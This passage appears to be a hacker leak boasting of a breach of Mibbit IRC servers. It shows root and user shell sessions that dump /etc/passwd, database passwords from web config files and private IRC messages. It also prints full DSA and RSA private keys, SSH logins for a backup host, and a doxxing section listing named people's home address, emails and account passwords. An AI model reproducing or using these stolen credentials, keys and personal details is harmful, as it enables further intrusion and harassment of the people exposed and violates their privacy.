drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root@tools:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root@tools:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root@tools:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root@tools:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root@tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root@tools:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
>>> karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
>>> thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
>>> ??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
>>> ...
[h@ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h@ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
>>> f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h@ck ~]$ ssh wwwadmin@status.mibbit.com
wwwadmin@status.mibbit.com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin@status:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin@status:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin@status:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin@status:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin@status:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin@status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin@status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin@status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin@status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin@status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin@status:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup@sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup@sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared@sidewinder.netonecom.net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix@sidewinder.netonecom.net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore@gmail.com
Email2: jimmy@axod.net
Email3: axod@axod.net
Email4: axodmedia@gmail.com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander@gmail.com <<< kikicat
Email2: alanonzander@yahoo.com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
